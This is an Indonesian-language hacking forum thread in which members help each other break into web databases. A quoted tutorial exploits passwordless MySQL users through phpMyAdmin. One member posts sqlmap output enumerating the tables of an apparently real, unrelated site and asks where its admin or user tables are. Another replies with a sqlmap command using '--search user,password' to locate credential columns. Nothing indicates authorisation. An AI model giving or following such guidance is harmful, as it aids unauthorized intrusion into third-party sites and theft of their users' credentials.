Posts: 2,063
Threads: 95
Joined: Jun 2011
ohh ane ngerti :
Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials).
Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:
pakek phpmyadmin via browser wkwkw
pantes ga ada lagi nampak pakek sqlmap
mungkin di urlnya dibikin url/phpmyadmin,masih kurang jelas si
Posts: 243
Threads: 12
Joined: Dec 2011
arghh masi belum ngarti ==
trus waktu kita masukin
select @@datadir;
/opt/lampp/var/mysql/
itu di terminal ato di web browser ya om??
Posts: 26
Threads: 4
Joined: Oct 2011
tanya bro, aku udah dapat database:
1. information_schema
2. web9db5
Tabelnya kaya'gini:
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: web9db5
[13 tables]
+--------------------+
| `-content_backup` |
| `-content_uk_back` |
| ausschreibungen |
| bildserien |
| bildserien_uk |
| content |
| content_fr |
| content_nl |
| content_uk |
| ergebnisse |
| fotografen |
| inhalttyp |
| medien |
+--------------------+
lha itu kok nggak ada tabel 'admin' atau 'user' ??,
nyariin'nya gimana?
tolong dibantu yaa...
Posts: 243
Threads: 12
Joined: Dec 2011
gimana om junior.riau18 bisa gak?
ane susah nih,,lelet amat..
Posts: 2,063
Threads: 95
Joined: Jun 2011
tambahin --search user,pasword
jadi sintaknya
sqlmap.py -u urltarget, -D namabd --search user,password